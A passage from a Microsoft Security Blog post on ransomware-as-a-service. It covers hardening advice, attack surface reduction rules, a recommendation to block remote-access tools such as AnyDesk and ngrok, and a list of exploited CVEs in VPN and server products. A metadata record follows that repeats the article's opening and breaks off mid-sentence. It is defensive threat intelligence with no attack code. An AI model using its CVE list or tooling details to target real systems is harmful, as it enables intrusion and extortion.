* Monitor for EventID 4625 (Logon Failed events) in Windows Event Forwarding when removing accounts from privileged groups. Adding them to the local administrator group on a limited set of machines to keep an application running still reduces the scope of an attack as against running them as Domain Admin.
* Randomize Local Administrator passwords with a tool like [Local Administrator Password S](<https://aka.ms/laps>)olution (LAPS) to prevent lateral movement using local accounts with shared passwords.
* Use a [cloud-based identity security solution](<https://docs.microsoft.com/defender-for-identity/what-is>) that leverages on-premises Active Directory signals get visibility into identity configurations and to identify and detect threats or compromised identities
### Auditing credential exposure
Auditing credential exposure is critical in preventing ransomware attacks and cybercrime in general. [BloodHound](<https://github.com/BloodHoundAD/BloodHound>) is a tool that was originally designed to provide network defenders with insight into the number of administrators in their environment. It can also be a powerful tool in reducing privileges tied to administrative account and understanding your credential exposure. IT security teams and SOCs can work together with the authorized use of this tool to enable the reduction of exposed credentials. Any teams deploying BloodHound should monitor it carefully for malicious use. They can also use [this detection guidance](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726>) to watch for malicious use.
Microsoft has observed ransomware attackers also using BloodHound in attacks. When used maliciously, BloodHound allows attackers to see the path of least resistance from the systems they have access, to highly privileged accounts like domain admin accounts and global administrator accounts in Azure.
### Prioritizing deployment of Active Directory updates
Security patches for Active Directory should be applied as soon as possible after they are released. Microsoft has witnessed ransomware attackers adopting authentication vulnerabilities within one hour of being made public and as soon as those vulnerabilities are included in tools like Mimikatz. Ransomware activity groups also rapidly adopt vulnerabilities related to authentication, such as ZeroLogon and PetitPotam, especially when they are included in toolkits like Mimikatz. When unpatched, these vulnerabilities could allow attackers to rapidly escalate from an entrance vector like email to Domain Admin level privileges.
### Cloud hardening
As attackers move towards cloud resources, it’s important to secure cloud resources and identities as well as on-premises accounts. Here are ways organizations can harden cloud environments:
**Cloud identity hardening**
* Implement the [Azure Security Benchmark](<https://docs.microsoft.com/security/benchmark/azure/>) and general [best practices for securing identity infrastructure](<https://docs.microsoft.com/azure/security/fundamentals/identity-management-best-practices>), including:
* Prevent on-premises service accounts from having direct rights to the cloud resources to prevent lateral movement to the cloud.
* Ensure that “break glass” account passwords are stored offline and configure honey-token activity for account usage.
* Implement [Conditional Access policies](<https://docs.microsoft.com/azure/active-directory/conditional-access/plan-conditional-access>) enforcing [Microsoft’s Zero Trust principles](<https://www.microsoft.com/security/business/zero-trust>).
* Enable [risk-based user sign-in protection](<https://docs.microsoft.com/azure/active-directory/authentication/tutorial-risk-based-sspr-mfa>) and automate threat response to block high-risk sign-ins from all locations and enable MFA for medium-risk ones.
* Ensure that VPN access is protected via [modern authentication methods](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#step-1-enable-modern-authentication-in-your-directory>).
**Multifactor authentication (MFA)**
* Enforce MFA on all accounts, remove users excluded from MFA, and strictly r[equire MFA](<https://docs.microsoft.com/azure/active-directory/identity-protection/howto-identity-protection-configure-mfa-policy>) from all devices, in all locations, at all times.
* Enable passwordless authentication methods (for example, Windows Hello, FIDO keys, or Microsoft Authenticator) for accounts that support passwordless. For accounts that still require passwords, use authenticator apps like Microsoft Authenticator for MFA. Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for the different authentication methods and features.
* [Identify and secure workload identities](<https://docs.microsoft.com/azure/active-directory/identity-protection/concept-workload-identity-risk>) to secure accounts where traditional MFA enforcement does not apply.
* Ensure that users are properly educated on not accepting unexpected two-factor authentication (2FA).
* For MFA that uses authenticator apps, ensure that the app requires a code to be typed in where possible, as many intrusions where MFA was enabled (including those by DEV-0537) still succeeded due to users clicking “Yes” on the prompt on their phones even when they were not at their [computers](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-mfa-number-match>). Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for an example.
* Disable [legacy authentication](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#moving-away-from-legacy-authentication>).
**Cloud admins**
* Ensure cloud admins/tenant admins are treated with [the same level of security and credential hygiene](<https://docs.microsoft.com/azure/active-directory/roles/best-practices>) as Domain Admins.
* Address [gaps in authentication coverage](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-authentication-find-coverage-gaps>).
### Addressing security blind spots
In almost every observed ransomware incident, at least one system involved in the attack had a misconfigured security product that allowed the attacker to disable protections or evade detection. In many instances, the initial access for access brokers is a legacy system that isn’t protected by antivirus or EDR solutions. It’s important to understand that the lack security controls on these systems that have access to highly privileged credentials act as blind spots that allow attackers to perform the entire ransomware and exfiltration attack chain from a single system without being detected. In some instances, this is specifically advertised as a feature that access brokers sell.
Organizations should review and verify that security tools are running in their most secure configuration and perform regular network scans to ensure appropriate security products are monitoring and protecting all systems, including servers. If this isn’t possible, make sure that your legacy systems are either physically isolated through a firewall or logically isolated by ensuring they have no credential overlap with other systems.
For Microsoft 365 Defender customers, the following checklist eliminates security blind spots:
* Turn on [cloud-delivered protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques, block new and unknown malware variants, and enhance attack surface reduction rules and tamper protection.
* Turn on [tamper protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) features to prevent attackers from stopping security services.
* Run [EDR in block mode](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>) so that Microsoft Defender for Endpoint can block malicious artifacts, even when a non-Microsoft antivirus doesn’t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode also blocks indicators identified proactively by Microsoft Threat Intelligence teams.
* Enable [network protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide>) to prevent applications or users from accessing malicious domains and other malicious content on the internet.
* Enable [investigation and remediation](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches.
* Use [device discovery](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>) to increase visibility into the network by finding unmanaged devices and onboarding them to Microsoft Defender for Endpoint.
* [Protect user identities and credentials](<https://docs.microsoft.com/defender-for-identity/what-is>) using Microsoft Defender for Identity, a cloud-based security solution that leverages on-premises Active Directory signals to monitor and analyze user behavior to identify suspicious user activities, configuration issues, and active attacks.
### Reducing the attack surface
Microsoft 365 Defender customers can turn on [attack surface reduction rules](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction?view=o365-worldwide>) to prevent common attack techniques used in ransomware attacks. These rules, which can be configured by all Microsoft Defender Antivirus customers and not just those using the EDR solution, offer significant hardening against attacks. In observed attacks from several ransomware-associated activity groups, Microsoft customers who had the following rules enabled were able to mitigate the attack in the initial stages and prevented hands-on-keyboard activity:
* Common entry vectors:
* [Block all Office applications from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)
* [Block Office communication application from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-communication-application-from-creating-child-processes>)
* [Block Office applications from creating executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-creating-executable-content>)
* [Block Office applications from injecting code into other processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-injecting-code-into-other-processes>)
* [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)
* [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)
* Ransomware deployment and lateral movement stage (in order of impact based on the stage in attack they prevent):
* [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)
* [Block credential stealing from the Windows local security authority subsystem (lsass.exe)](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-credential-stealing-from-the-windows-local-security-authority-subsystem>)
* [Block process creations originating from PsExec and WMI commands](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)
* [Use advanced protection against ransomware](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#use-advanced-protection-against-ransomware>)
In addition, Microsoft has changed the [default behavior of Office applications to block macros](<https://docs.microsoft.com/DeployOffice/security/internet-macros-blocked>) in files from the internet, further reduce the attack surface for many human-operated ransomware attacks and other threats.
### Hardening internet-facing assets and understanding your perimeter
Organizations must identify and secure perimeter systems that attackers might use to access the network. Public scanning interfaces, such as [RiskIQ](<https://www.riskiq.com/what-is-attack-surface-management/>), can be used to augment data. Some systems that should be considered of interest to attackers and therefore need to be hardened include:
* Secure Remote Desktop Protocol (RDP) or Windows Virtual Desktop endpoints with MFA to harden against password spray or brute force attacks.
* Block Remote IT management tools such as Teamviewer, Splashtop, Remote Manipulator System, Anydesk, Atera Remote Management, and ngrok.io via network blocking such as perimeter firewall rules if not in use in your environment. If these systems are used in your environment, enforce security settings where possible to implement MFA.
Ransomware attackers and access brokers also use unpatched vulnerabilities, whether already disclosed or zero-day, especially in the initial access stage. Even older vulnerabilities were implicated in ransomware incidents in 2022 because some systems remained unpatched, partially patched, or because access brokers had established persistence on a previously compromised systems despite it later being patched.
Some observed vulnerabilities used in campaigns between 2020 and 2022 that defenders can check for and mitigate include:
* Citrix ADC systems affected by [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>)
* [Pulse Secure VPN systems](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) affected by [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>), [CVE-2020-8260](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8260>), [CVE-2020-8243](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8243>), [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>), [CVE-2021-22894](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22894>), [CVE-2021-22899](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22899>), and [CVE-2021-22900](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22900>)
* SonicWall SSLVPN affected by [CVE-2021-20016](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20016>)
* Microsoft SharePoint servers affected by [CVE-2019-0604](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2019-0604>)
* Unpatched [Microsoft Exchange servers](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-may-2021-exchange-server-security-updates/ba-p/2335209>)
* Zoho ManageEngine systems affected by [CVE-2020-10189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189>)
* FortiGate VPN servers affected by [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)
* Apache log4j [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)
Ransomware attackers also rapidly [adopt new vulnerabilities](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). To further reduce organizational exposure, Microsoft Defender for Endpoint customers can use the [threat and vulnerability management](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations.
## Microsoft 365 Defender: Deep cross-domain visibility and unified investigation capabilities to defend against ransomware attacks
The multi-faceted threat of ransomware requires a comprehensive approach to security. The steps we outlined above defend against common attack patterns and will go a long way in preventing ransomware attacks. [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) is designed to make it easy for organizations to apply many of these security controls.
Microsoft 365 Defender’s industry-leading visibility and detection capabilities, demonstrated in the recent [MITRE Engenuity ATT&CK® Evaluations](<https://www.microsoft.com/security/blog/2022/04/05/microsoft-365-defender-demonstrates-industry-leading-protection-in-the-2022-mitre-engenuity-attck-evaluations/>), automatically stop most common threats and attacker techniques. To equip organizations with the tools to combat human-operated ransomware, which by nature takes a unique path for every organization, Microsoft 365 Defender provides rich investigation features that enable defenders to seamlessly inspect and remediate malicious behavior across domains.
[Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365.](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>)
In line with the recently announced expansion into a new service category called [**Microsoft Security Experts**](<https://www.microsoft.com/en-us/security/business/services>), we're introducing the availability of [Microsoft Defender Experts for Hunting](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/defenderexpertsforhuntingprev>) for public preview. Defender Experts for Hunting is for customers who have a robust security operations center but want Microsoft to help them proactively hunt for threats across Microsoft Defender data, including endpoints, Office 365, cloud applications, and identity.
Join our research team at the **Microsoft Security Summit** digital event on May 12 to learn what developments Microsoft is seeing in the threat landscape, as well as how we can help your business mitigate these types of attacks. Ask your most pressing questions during the live chat Q&A. [Register today.](<https://mssecuritysummit.eventcore.com?ocid=AID3046765_QSG_584073>)
The post [Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself](<https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).
{"id": "MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "vendorId": null, "type": "mmpc", "bulletinFamily": "blog", "title": "Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself", "description": "Microsoft processes 24 trillion signals every 24 hours, and we have blocked billions of attacks in the last year alone. Microsoft Security tracks more than 35 unique ransomware families and 250 unique threat actors across observed nation-state, ransomware, and criminal activities.\n\nThat depth of signal intelligence gathered from various domains\u2014identity, email, data, and cloud\u2014provides us with insight into the gig economy that attackers have created with tools designed to lower the barrier for entry for other attackers, who in turn continue to pay dividends and fund operations through the sale and associated \u201ccut\u201d from their tool\u2019s success.\n\nThe cybercriminal economy is a continuously evolving connected ecosystem of many players with different techniques, goals, and skillsets. In the same way our traditional economy has shifted toward gig workers for efficiency, criminals are learning that there\u2019s less work and less risk involved by renting or selling their tools for a portion of the profits than performing the attacks themselves. This industrialization of the cybercrime economy has made it easier for attackers to use ready-made penetration testing and other tools to perform their attacks.\n\nWithin this category of threats, Microsoft has been tracking the trend in the ransomware-as-a-service (RaaS) gig economy, called [human-operated ransomware](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>), which remains one of the most impactful threats to organizations. We coined the industry term \u201chuman-operated ransomware\u201d to clarify that these threats are driven by humans who make decisions at every stage of their attacks based on what they find in their target\u2019s network.\n\nUnlike the broad targeting and opportunistic approach of earlier ransomware infections, attackers behind these human-operated campaigns vary their attack patterns depending on their discoveries\u2014for example, a security product that isn\u2018t configured to prevent tampering or a service that\u2019s running as a highly privileged account like a domain admin. Attackers can use those weaknesses to elevate their privileges to steal even more valuable data, leading to a bigger payout for them\u2014with no guarantee they\u2019ll leave their target environment once they\u2019ve been paid. Attackers are also often more determined to stay on a network once they gain access and sometimes repeatedly monetize that access with additional attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nRansomware attacks have become even more impactful in recent years as more ransomware-as-a-service ecosystems have adopted the double extortion monetization strategy. All ransomware is a form of extortion, but now, attackers are not only encrypting data on compromised devices but also exfiltrating it and then posting or threatening to post it publicly to pressure the targets into paying the ransom. Most ransomware attackers opportunistically deploy ransomware to whatever network they get access to, and some even purchase access to networks from other cybercriminals. Some attackers prioritize organizations with higher revenues, while others prefer specific industries for the shock value or type of data they can exfiltrate.\n\nAll human-operated ransomware campaigns\u2014all human-operated attacks in general, for that matter\u2014share common dependencies on security weaknesses that allow them to succeed. Attackers most commonly take advantage of **an organization\u2019s poor credential hygiene and legacy configurations or misconfigurations to find easy entry and privilege escalation points in an environment.** \n\nIn this blog, we detail several of the ransomware ecosystems using the RaaS model, the importance of cross-domain visibility in finding and evicting these actors, and best practices organizations can use to protect themselves from this increasingly popular style of attack. We also offer security best practices on credential hygiene and cloud hardening, how to address security blind spots, harden internet-facing assets to understand your perimeter, and more. Here\u2019s a quick table of contents:\n\n 1. **How RaaS redefines our understanding of ransomware incidents**\n * The RaaS affiliate model explained\n * Access for sale and mercurial targeting\n 2. **\u201cHuman-operated\u201d means human decisions**\n * Exfiltration and double extortion\n * Persistent and sneaky access methods\n 3. **Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks**\n 4. **Defending against ransomware: Moving beyond protection by detection**\n * Building credential hygiene\n * Auditing credential exposure\n * Prioritizing deployment of Active Directory updates\n * Cloud hardening\n * Addressing security blind spots\n * Reducing the attack surface\n * Hardening internet-facing assets and understanding your perimeter\n\n## How RaaS redefines our understanding of ransomware incidents\n\nWith ransomware being the preferred method for many cybercriminals to monetize attacks, human-operated ransomware remains one of the most impactful threats to organizations today, and it only continues to evolve. This evolution is driven by the \u201chuman-operated\u201d aspect of these attacks\u2014attackers make informed and calculated decisions, resulting in varied attack patterns tailored specifically to their targets and iterated upon until the attackers are successful or evicted.\n\nIn the past, we\u2019ve observed a tight relationship between the initial entry vector, tools, and ransomware payload choices in each campaign of one strain of ransomware. The RaaS affiliate model, which has allowed more criminals, regardless of technical expertise, to deploy ransomware built or managed by someone else, is weakening this link. As ransomware deployment becomes a gig economy, it has become more difficult to link the tradecraft used in a specific attack to the ransomware payload developers.\n\nReporting a ransomware incident by assigning it with the payload name gives the impression that a monolithic entity is behind all attacks using the same ransomware payload and that all incidents that use the ransomware share common techniques and infrastructure. However, focusing solely on the ransomware stage obscures many stages of the attack that come before, including actions like data exfiltration and additional persistence mechanisms, as well as the numerous detection and protection opportunities for network defenders.\n\nWe know, for example, that the underlying techniques used in human-operated ransomware campaigns haven\u2019t changed very much over the years\u2014attacks still prey on the same security misconfigurations to succeed. Securing a large corporate network takes disciplined and sustained focus, but there\u2019s a high ROI in implementing critical controls that prevent these attacks from having a wider impact, even if it\u2019s only possible on the most critical assets and segments of the network. \n\nWithout the ability to steal access to highly privileged accounts, attackers can\u2019t move laterally, spread ransomware widely, access data to exfiltrate, or use tools like Group Policy to impact security settings. Disrupting common attack patterns by applying security controls also reduces alert fatigue in security SOCs by stopping the attackers before they get in. This can also prevent unexpected consequences of short-lived breaches, such as exfiltration of network topologies and configuration data that happens in the first few minutes of execution of some trojans.\n\nIn the following sections, we explain the RaaS affiliate model and disambiguate between the attacker tools and the various threat actors at play during a security incident. Gaining this clarity helps surface trends and common attack patterns that inform defensive strategies focused on preventing attacks rather than detecting ransomware payloads. Threat intelligence and insights from this research also enrich our solutions like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), whose comprehensive security capabilities help protect customers by detecting RaaS-related attack attempts.\n\n### The RaaS affiliate model explained\n\nThe cybercriminal economy\u2014a connected ecosystem of many players with different techniques, goals, and skillsets\u2014is evolving. The industrialization of attacks has progressed from attackers using off-the-shelf tools, such as Cobalt Strike, to attackers being able to purchase access to networks and the payloads they deploy to them. This means that the impact of a successful ransomware and extortion attack remains the same regardless of the attacker\u2019s skills.\n\nRaaS is an arrangement between an operator and an affiliate. The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. The RaaS program may also include a leak site to share snippets of data exfiltrated from victims, allowing attackers to show that the exfiltration is real and try to extort payment. Many RaaS programs further incorporate a suite of extortion support offerings, including leak site hosting and integration into ransom notes, as well as decryption negotiation, payment pressure, and cryptocurrency transaction services\n\nRaaS thus gives a unified appearance of the payload or campaign being a single ransomware family or set of attackers. However, what happens is that the RaaS operator sells access to the ransom payload and decryptor to an affiliate, who performs the intrusion and privilege escalation and who is responsible for the deployment of the actual ransomware payload. The parties then split the profit. In addition, RaaS developers and operators might also use the payload for profit, sell it, and run their campaigns with other ransomware payloads\u2014further muddying the waters when it comes to tracking the criminals behind these actions.\n\nFigure 1. How the RaaS affiliate model enables ransomware attacks\n\n### Access for sale and mercurial targeting\n\nA component of the cybercriminal economy is selling access to systems to other attackers for various purposes, including ransomware. Access brokers can, for instance, infect systems with malware or a botnet and then sell them as a \u201cload\u201d. A load is designed to install other malware or backdoors onto the infected systems for other criminals. Other access brokers scan the internet for vulnerable systems, like exposed Remote Desktop Protocol (RDP) systems with weak passwords or unpatched systems, and then compromise them _en masse_ to \u201cbank\u201d for later profit. Some advertisements for the sale of initial access specifically cite that a system isn\u2019t managed by an antivirus or endpoint detection and response (EDR) product and has a highly privileged credential such as Domain Administrator associated with it to fetch higher prices.\n\nMost ransomware attackers opportunistically deploy ransomware to whatever network they get access to. Some attackers prioritize organizations with higher revenues, while some target specific industries for the shock value or type of data they can exfiltrate (for example, attackers targeting hospitals or exfiltrating data from technology companies). In many cases, the targeting doesn\u2019t manifest itself as specifically attacking the target\u2019s network, instead, the purchase of access from an access broker or the use of existing malware infection to pivot to ransomware activities.\n\nIn some ransomware attacks, the affiliates who bought a load or access may not even know or care how the system was compromised in the first place and are just using it as a \u201cjump server\u201d to perform other actions in a network. Access brokers often list the network details for the access they are selling, but affiliates aren\u2019t usually interested in the network itself but rather the monetization potential. As a result, some attacks that seem targeted to a specific industry might simply be a case of affiliates purchasing access based on the number of systems they could deploy ransomware to and the perceived potential for profit.\n\n## \u201cHuman-operated\u201d means human decisions\n\nMicrosoft coined the term \u201chuman-operated ransomware\u201d to clearly define a class of attacks driven by expert human intelligence at every step of the attack chain and culminate in intentional business disruption and extortion. Human-operated ransomware attacks share commonalities in the security misconfigurations of which they take advantage and the manual techniques used for lateral movement and persistence. However, the human-operated nature of these actions means that variations in attacks\u2014including objectives and pre-ransom activity\u2014evolve depending on the environment and the unique opportunities identified by the attackers.\n\nThese attacks involve many reconnaissance activities that enable human operators to profile the organization and know what next steps to take based on specific knowledge of the target. Many of the initial access campaigns that provide access to RaaS affiliates perform automated reconnaissance and exfiltration of information collected in the first few minutes of an attack.\n\nAfter the attack shifts to a hands-on-keyboard phase, the reconnaissance and activities based on this knowledge can vary, depending on the tools that come with the RaaS and the operator\u2019s skill. Frequently attackers query for the currently running security tools, privileged users, and security settings such as those defined in Group Policy before continuing their attack. The data discovered via this reconnaissance phase informs the attacker\u2019s next steps.\n\nIf there\u2019s minimal security hardening to complicate the attack and a highly privileged account can be gained immediately, attackers move directly to deploying ransomware by editing a Group Policy. The attackers take note of security products in the environment and attempt to tamper with and disable these, sometimes using scripts or tools provided with RaaS purchase that try to disable multiple security products at once, other times using specific commands or techniques performed by the attacker. \n\nThis human decision-making early in the reconnaissance and intrusion stages means that even if a target\u2019s security solutions detect specific techniques of an attack, the attackers may not get fully evicted from the network and can use other collected knowledge to attempt to continue the attack in ways that bypass security controls. In many instances, attackers test their attacks \u201cin production\u201d from an undetected location in their target\u2019s environment, deploying tools or payloads like commodity malware. If these tools or payloads are detected and blocked by an antivirus product, the attackers simply grab a different tool, modify their payload, or tamper with the security products they encounter. Such detections could give SOCs a false sense of security that their existing solutions are working. However, these could merely serve as a smokescreen to allow the attackers to further tailor an attack chain that has a higher probability of success. Thus, when the attack reaches the active attack stage of deleting backups or shadow copies, the attack would be minutes away from ransomware deployment. The adversary would likely have already performed harmful actions like the exfiltration of data. This knowledge is key for SOCs responding to ransomware: prioritizing investigation of alerts or detections of tools like Cobalt Strike and performing swift remediation actions and incident response (IR) procedures are critical for containing a human adversary before the ransomware deployment stage.\n\n### Exfiltration and double extortion\n\nRansomware attackers often profit simply by disabling access to critical systems and causing system downtime. Although that simple technique often motivates victims to pay, it is not the only way attackers can monetize their access to compromised networks. Exfiltration of data and \u201cdouble extortion,\u201d which refers to attackers threatening to leak data if a ransom hasn\u2019t been paid, has also become a common tactic among many RaaS affiliate programs\u2014many of them offering a unified leak site for their affiliates. Attackers take advantage of common weaknesses to exfiltrate data and demand ransom without deploying a payload.\n\nThis trend means that focusing on protecting against ransomware payloads via security products or encryption, or considering backups as the main defense against ransomware, instead of comprehensive hardening, leaves a network vulnerable to all the stages of a human-operated ransomware attack that occur before ransomware deployment. This exfiltration can take the form of using tools like Rclone to sync to an external site, setting up email transport rules, or uploading files to cloud services. With double extortion, attackers don\u2019t need to deploy ransomware and cause downtime to extort money. Some attackers have moved beyond the need to deploy ransomware payloads and are shifting straight to extortion models or performing the destructive objectives of their attacks by directly deleting cloud resources. One such extortion attackers is DEV-0537 (also known as LAPSUS$), which is profiled below. \n\n### Persistent and sneaky access methods\n\nPaying the ransom may not reduce the risk to an affected network and potentially only serves to fund cybercriminals. Giving in to the attackers\u2019 demands doesn\u2019t guarantee that attackers ever \u201cpack their bags\u201d and leave a network. Attackers are more determined to stay on a network once they gain access and sometimes repeatedly monetize attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nThe handoff between different attackers as transitions in the cybercriminal economy occur means that multiple attackers may retain persistence in a compromised environment using an entirely different set of tools from those used in a ransomware attack. For example, initial access gained by a banking trojan leads to a Cobalt Strike deployment, but the RaaS affiliate that purchased the access may choose to use a less detectable remote access tool such as TeamViewer to maintain persistence on the network to operate their broader series of campaigns. Using legitimate tools and settings to persist versus malware implants such as Cobalt Strike is a popular technique among ransomware attackers to avoid detection and remain resident in a network for longer.\n\nSome of the common enterprise tools and techniques for persistence that Microsoft has observed being used include:\n\n * AnyDesk\n * Atera Remote Management\n * ngrok.io\n * Remote Manipulator System\n * Splashtop\n * TeamViewer\n\nAnother popular technique attackers perform once they attain privilege access is the creation of new backdoor user accounts, whether local or in Active Directory. These newly created accounts can then be added to remote access tools such as a virtual private network (VPN) or Remote Desktop, granting remote access through accounts that appear legitimate on the network. Ransomware attackers have also been observed editing the settings on systems to enable Remote Desktop, reduce the protocol\u2019s security, and add new users to the Remote Desktop Users group.\n\nThe time between initial access to a hands-on keyboard deployment can vary wildly depending on the groups and their workloads or motivations. Some activity groups can access thousands of potential targets and work through these as their staffing allows, prioritizing based on potential ransom payment over several months. While some activity groups may have access to large and highly resourced companies, they prefer to attack smaller companies for less overall ransom because they can execute the attack within hours or days. In addition, the return on investment is higher from companies that can\u2019t respond to a major incident. Ransoms of tens of millions of dollars receive much attention but take much longer to develop. Many groups prefer to ransom five to 10 smaller targets in a month because the success rate at receiving payment is higher in these targets. Smaller organizations that can\u2019t afford an IR team are often more likely to pay tens of thousands of dollars in ransom than an organization worth millions of dollars because the latter has a developed IR capability and is likely to follow legal advice against paying. In some instances, a ransomware associate threat actor may have an implant on a network and never convert it to ransom activity. In other cases, initial access to full ransom (including handoff from an access broker to a RaaS affiliate) takes less than an hour.\n\nFigure 2. Human-operated ransomware targeting and rate of success, based on a sampling of Microsoft data over six months between 2021 and 2022\n\nThe human-driven nature of these attacks and the scale of possible victims under control of ransomware-associated threat actors underscores the need to take targeted proactive security measures to harden networks and prevent these attacks in their early stages.\n\n## Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks\n\nFor organizations to successfully respond to evict an active attacker, it\u2019s important to understand the active stage of an ongoing attack. In the early attack stages, such as deploying a banking trojan, common remediation efforts like isolating a system and resetting exposed credentials may be sufficient. As the attack progresses and the attacker performs reconnaissance activities and exfiltration, it\u2019s important to implement an incident response process that scopes the incident to address the impact specifically. Using a threat intelligence-driven methodology for understanding attacks can assist in determining incidents that need additional scoping.\n\nIn the next sections, we provide a deep dive into the following prominent ransomware threat actors and their campaigns to increase community understanding of these attacks and enable organizations to better protect themselves:\n\n * DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today \n * ELBRUS: (Un)arrested development\n * DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n * DEV-0237: Prolific collaborator\n * DEV-0206 and DEV-0243: An \u201cevil\u201d partnership\n * DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate\n * DEV-0537: From extortion to destruction\n\nMicrosoft threat intelligence directly informs our products as part of our commitment to track adversaries and protect customers. Microsoft 365 Defender customers should prioritize alerts titled \u201cRansomware-linked emerging threat activity group detected\u201d. We also add the note \u201cOngoing hands-on-keyboard attack\u201d to alerts that indicate a human attacker is in the network. When these alerts are raised, it\u2019s highly recommended to initiate an incident response process to scope the attack, isolate systems, and regain control of credentials attackers may be in control of.\n\nA note on threat actor naming: as part of Microsoft\u2019s ongoing commitment to track both nation-state and cybercriminal threat actors, we refer to the unidentified threat actors as a \u201cdevelopment group\u201d. We use a naming structure with a prefix of \u201cDEV\u201d to indicate an emerging threat group or unique activity during investigation. When a nation-state group moves out of the DEV stage, we use chemical elements (for example, PHOSPHOROUS and NOBELIUM) to name them. On the other hand, we use volcano names (such as ELBRUS) for ransomware or cybercriminal activity groups that have moved out of the DEV state. In the cybercriminal economy, relationships between groups change very rapidly. Attackers are known to hire talent from other cybercriminal groups or use \u201ccontractors,\u201d who provide gig economy-style work on a limited time basis and may not rejoin the group. This shifting nature means that many of the groups Microsoft tracks are labeled as DEV, even if we have a concrete understanding of the nature of the activity group.\n\n### DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today\n\nA vast amount of the current cybercriminal economy connects to a nexus of activity that Microsoft tracks as DEV-0193, also referred to as Trickbot 